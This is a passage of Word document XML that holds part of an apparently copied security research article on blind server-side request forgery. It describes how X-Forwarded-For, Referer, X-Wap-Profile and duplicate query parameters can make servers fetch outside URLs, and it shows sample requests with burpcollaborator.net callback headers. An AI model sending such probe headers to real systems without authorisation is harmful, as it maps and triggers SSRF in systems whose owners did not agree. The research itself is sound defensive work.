          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Referer: http://c.burpcollaborator.net/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X-WAP-Profile: http://d.burpcollaborator.net/wap.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F382D20" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927F926" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One example of a callback technique that's easy to trigger but difficult to exploit is the X-Forwarded-For and True-Client-IP HTTP headers, which are commonly used by pentesters to spoof their IP address but also support hostnames. Applications that trust these headers will perform DNS lookups to resolve the supplied hostnames into IP addresses. This serves as a great indicator that they're vulnerable to IP spoofing attacks, but unless you have a convenient DNS library memory corruption vulnerability the callback behavior itself isn't exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DD616" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AD512" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Similarly, web analytics systems will often fetch any unrecognized URL specified in the Referer header of arriving visitors. Some analytics systems will even attempt to actively crawl the entire website specified in a referer URL for SEO purposes. This behavior may prove useful, so it's worth specifying a permissive robots.txt file to encourage it. This is effectively a blind </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>SSRF vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as there's no way for the user to view the results of the analytics system's request, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and it often occurs minutes or hours after the user request, which further complicates exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACED86" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>Duplicate parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2133A7" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For some reason Incapsula will fetch any URL that's specified twice in the query string. Unfortunately they don't have a bug bounty program, so I was unable to investigate whether this is exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC75ED1" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:line="420" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>X-Wap-Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048D46E7" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>X-Wap-Profile is ancient HTTP header which should specify a URL to the device's User Agent Profile (UAProf), an XML document which defines device capabilities such as screen size, bluetooth support, supported protocols and charsets, etc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE5D0A1" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host: facebook.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X-Wap-Profile: http://nds1.nds.nokia.com/uaprof/N6230r200.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81799F" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compliant applications will extract the URL from this header, then fetch and parse the specified XML document so they can tailor the content they supply to the client. This combination of two high risk pieces of functionality - fetching untrusted URLs and parsing untrusted XML - with obscure and easily-missed functionality seems ripe for exploitation. Unfortunately it's not widely supported - Facebook was the only bug bounty site I could find that uses it, and they appear to be doing their XML parsing with due caution. They also only fetch the specified XML document roughly 26 hours after the request, making comprehensive iterative testing intensely impractical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DAA86" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205ADFF7" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3178A4CE" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BDE507" w14:textId="77777777" w:rsidR="00B00153" w:rsidRPr="00E4142C" w:rsidRDefault="00B00153">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B00153" w:rsidRPr="00E414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20B0F" w14:textId="77777777" w:rsidR="005F3D09" w:rsidRDefault="005F3D09" w:rsidP="005E4E88">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0437B994" w14:textId="77777777" w:rsidR="005F3D09" w:rsidRDefault="005F3D09" w:rsidP="005E4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4D156" w14:textId="77777777" w:rsidR="005F3D09" w:rsidRDefault="005F3D09" w:rsidP="005E4E88">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35218049" w14:textId="77777777" w:rsidR="005F3D09" w:rsidRDefault="005F3D09" w:rsidP="005E4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C7ED7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9444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63D39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE9C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830E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8584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D0B98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="040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636BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="482A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64BBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98BE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BF451E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8B2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D06D55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4606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52091"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09DA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65C46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6776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9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>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A5"/>
    <w:rsid w:val="00010EA9"/>
    <w:rsid w:val="001063BC"/>
    <w:rsid w:val="001822E8"/>
    <w:rsid w:val="00504F37"/>
    <w:rsid w:val="005154F9"/>
    <w:rsid w:val="005222FB"/>
    <w:rsid w:val="005C189A"/>
    <w:rsid w:val="005E4E88"/>
    <w:rsid w:val="005F3D09"/>
    <w:rsid w:val="006912BC"/>
    <w:rsid w:val="007F665B"/>
    <w:rsid w:val="008371A8"/>
    <w:rsid w:val="008F55AC"/>
    <w:rsid w:val="00964325"/>
    <w:rsid w:val="009A14A7"/>
    <w:rsid w:val="00A812FD"/>
    <w:rsid w:val="00B00153"/>
    <w:rsid w:val="00B54379"/>
    <w:rsid w:val="00BF3358"/>
    <w:rsid w:val="00C87E2F"/>
    <w:rsid w:val="00CF02DF"/>
    <w:rsid w:val="00D4415D"/>
    <w:rsid w:val="00D768DB"/>
    <w:rsid w:val="00D97BA5"/>
    <w:rsid w:val="00DB1B0B"/>
    <w:rsid w:val="00DB66E5"/>
    <w:rsid w:val="00E06462"/>
    <w:rsid w:val="00E4142C"/>
    <w:rsid w:val="00E6031E"/>
    <w:rsid w:val="00F476BC"/>
    <w:rsid w:val="00F66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36A04"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{959E872B-D1F2-4DAC-8AC6-16AF4E62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E4E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912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154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E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4E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912BC"/>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912B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12BC"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005154F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154F9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="text-center">
    <w:name w:val="text-center"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D768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9880">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="169101056">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="198864318">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="329212895">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1659653710">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="338656619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1820337789">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="349452150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1816600821">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E6E6E6"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="472909083">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="526220632">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1939755368">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="629827757">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633760099">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="711729764">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
